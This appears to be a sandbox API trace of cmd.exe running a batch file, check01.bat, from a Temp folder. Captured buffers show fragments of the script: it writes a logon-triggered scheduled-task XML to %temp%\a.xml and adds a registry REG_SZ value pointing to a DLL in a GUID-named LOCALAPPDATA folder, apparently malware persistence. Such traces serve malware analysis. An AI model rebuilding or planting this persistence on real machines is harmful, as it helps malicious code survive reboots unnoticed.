[0378.193] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.193] GetFileType (hFile=0x64) returned 0x1
[0378.193] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.194] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x63d
[0378.194] GetProcessHeap () returned 0x200000
[0378.194] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.194] GetProcessHeap () returned 0x200000
[0378.194] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.194] GetProcessHeap () returned 0x200000
[0378.194] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.194] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.194] GetProcessHeap () returned 0x200000
[0378.194] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.194] GetProcessHeap () returned 0x200000
[0378.196] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.196] GetProcessHeap () returned 0x200000
[0378.197] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.197] _tell (_FileHandle=3) returned 1597
[0378.197] _close (_FileHandle=3) returned 0
[0378.197] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.198] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.198] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.198] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.198] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.198] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.198] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.198] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.198] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.198] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.198] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.198] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.198] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.198] GetFileType (hFile=0x7) returned 0x2
[0378.199] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.199] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.200] _dup (_FileHandle=1) returned 3
[0378.201] _close (_FileHandle=1) returned 0
[0378.202] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.202] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.202] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.202] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.202] GetFileType (hFile=0x64) returned 0x1
[0378.202] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x294
[0378.202] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x293
[0378.203] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.203] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.203] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21f4a0, Size=0x30) returned 0x216db0
[0378.203] GetProcessHeap () returned 0x200000
[0378.203] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x216db0) returned 0x30
[0378.203] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 15
[0378.203] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.204] GetFileType (hFile=0x64) returned 0x1
[0378.204] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.204] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 16
[0378.204] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0xf, lpOverlapped=0x0) returned 1
[0378.204] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.206] _close (_FileHandle=3) returned 0
[0378.206] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.206] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.207] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.207] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.208] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.208] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.208] SetConsoleInputExeNameW () returned 0x1
[0378.208] GetConsoleOutputCP () returned 0x1b5
[0378.209] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.209] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.209] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.210] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.210] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.210] SetFilePointer (in: hFile=0x64, lDistanceToMove=1597, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x63d
[0378.210] GetProcessHeap () returned 0x200000
[0378.210] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216df0 | out: hHeap=0x200000) returned 1
[0378.210] GetProcessHeap () returned 0x200000
[0378.211] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216db0 | out: hHeap=0x200000) returned 1
[0378.211] GetProcessHeap () returned 0x200000
[0378.211] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.211] GetProcessHeap () returned 0x200000
[0378.211] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.211] GetProcessHeap () returned 0x200000
[0378.211] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.211] GetProcessHeap () returned 0x200000
[0378.211] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.211] GetProcessHeap () returned 0x200000
[0378.211] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.211] GetProcessHeap () returned 0x200000
[0378.211] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.212] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.212] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x63d
[0378.212] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x8f5, lpOverlapped=0x0) returned 1
[0378.212] SetFilePointer (in: hFile=0x64, lDistanceToMove=1635, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x663
[0378.212] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=38, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nogonType^> >> %temp%\\a.xml\r\n\r\n\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 38
[0378.212] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.212] GetFileType (hFile=0x64) returned 0x1
[0378.212] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.213] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x663
[0378.213] GetProcessHeap () returned 0x200000
[0378.213] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.213] GetProcessHeap () returned 0x200000
[0378.213] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.213] GetProcessHeap () returned 0x200000
[0378.213] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.213] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.213] GetProcessHeap () returned 0x200000
[0378.213] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.213] GetProcessHeap () returned 0x200000
[0378.215] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.215] GetProcessHeap () returned 0x200000
[0378.216] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.216] _tell (_FileHandle=3) returned 1635
[0378.216] _close (_FileHandle=3) returned 0
[0378.216] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.216] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.216] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.216] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.216] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.216] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.217] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.217] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.217] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.217] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.217] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.217] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.217] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.217] GetFileType (hFile=0x7) returned 0x2
[0378.218] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.218] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.219] _dup (_FileHandle=1) returned 3
[0378.220] _close (_FileHandle=1) returned 0
[0378.221] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.221] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.221] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.221] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.221] GetFileType (hFile=0x64) returned 0x1
[0378.221] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2a3
[0378.221] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x2a2
[0378.222] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.222] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.222] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21f4a0, Size=0x32) returned 0x216db0
[0378.222] GetProcessHeap () returned 0x200000
[0378.222] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x216db0) returned 0x32
[0378.222] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 16
[0378.222] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.223] GetFileType (hFile=0x64) returned 0x1
[0378.223] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.223] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 17
[0378.223] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x10, lpOverlapped=0x0) returned 1
[0378.223] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.224] _close (_FileHandle=3) returned 0
[0378.225] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.225] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.226] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.226] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.227] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.227] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.227] SetConsoleInputExeNameW () returned 0x1
[0378.227] GetConsoleOutputCP () returned 0x1b5
[0378.228] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.228] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.228] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.228] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.229] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.229] SetFilePointer (in: hFile=0x64, lDistanceToMove=1635, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x663
[0378.229] GetProcessHeap () returned 0x200000
[0378.229] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0378.229] GetProcessHeap () returned 0x200000
[0378.229] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216db0 | out: hHeap=0x200000) returned 1
[0378.229] GetProcessHeap () returned 0x200000
[0378.230] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.230] GetProcessHeap () returned 0x200000
[0378.230] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.230] GetProcessHeap () returned 0x200000
[0378.230] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.230] GetProcessHeap () returned 0x200000
[0378.230] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.230] GetProcessHeap () returned 0x200000
[0378.230] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.230] GetProcessHeap () returned 0x200000
[0378.230] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.231] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.231] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x663
[0378.231] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x8cf, lpOverlapped=0x0) returned 1
[0378.231] SetFilePointer (in: hFile=0x64, lDistanceToMove=1670, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x686
[0378.231] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=35, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nl\r\nogonType^> >> %temp%\\a.xml\r\n\r\n\r\ns/2004/02/mit/task\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 35
[0378.231] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.231] GetFileType (hFile=0x64) returned 0x1
[0378.231] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.231] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x686
[0378.232] GetProcessHeap () returned 0x200000
[0378.232] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.232] GetProcessHeap () returned 0x200000
[0378.232] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.232] GetProcessHeap () returned 0x200000
[0378.232] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.232] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.232] GetProcessHeap () returned 0x200000
[0378.232] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.232] GetProcessHeap () returned 0x200000
[0378.233] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.233] GetProcessHeap () returned 0x200000
[0378.233] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.233] _tell (_FileHandle=3) returned 1670
[0378.234] _close (_FileHandle=3) returned 0
[0378.234] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.234] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.234] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.234] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.235] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.235] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.235] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.235] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.235] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.235] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.235] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.235] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.235] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.235] GetFileType (hFile=0x7) returned 0x2
[0378.236] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.236] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.236] _dup (_FileHandle=1) returned 3
[0378.237] _close (_FileHandle=1) returned 0
[0378.238] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.238] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.238] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.238] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.238] GetFileType (hFile=0x64) returned 0x1
[0378.238] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2b3
[0378.239] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x2b2
[0378.239] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.239] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.239] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x228690, Size=0x28) returned 0x21b150
[0378.239] GetProcessHeap () returned 0x200000
[0378.239] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x21b150) returned 0x28
[0378.239] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 13
[0378.239] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.240] GetFileType (hFile=0x64) returned 0x1
[0378.240] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.240] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 14
[0378.240] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0xd, lpOverlapped=0x0) returned 1
[0378.240] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.241] _close (_FileHandle=3) returned 0
[0378.242] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.242] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.243] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.243] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.244] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.244] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.244] SetConsoleInputExeNameW () returned 0x1
[0378.244] GetConsoleOutputCP () returned 0x1b5
[0378.245] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.245] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.245] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.246] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.246] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.246] SetFilePointer (in: hFile=0x64, lDistanceToMove=1670, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x686
[0378.246] GetProcessHeap () returned 0x200000
[0378.246] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216db0 | out: hHeap=0x200000) returned 1
[0378.246] GetProcessHeap () returned 0x200000
[0378.246] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b150 | out: hHeap=0x200000) returned 1
[0378.246] GetProcessHeap () returned 0x200000
[0378.247] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.247] GetProcessHeap () returned 0x200000
[0378.247] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.247] GetProcessHeap () returned 0x200000
[0378.247] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.247] GetProcessHeap () returned 0x200000
[0378.247] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.247] GetProcessHeap () returned 0x200000
[0378.247] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.247] GetProcessHeap () returned 0x200000
[0378.247] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.248] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.248] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x686
[0378.248] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x8ac, lpOverlapped=0x0) returned 1
[0378.248] SetFilePointer (in: hFile=0x64, lDistanceToMove=1757, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6dd
[0378.248] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^IgnoreNew^ >> %temp%\\a.xml\r\n", cbMultiByte=87, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^IgnoreNew^ >> %temp%\\a.xml\r\nk\"^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 87
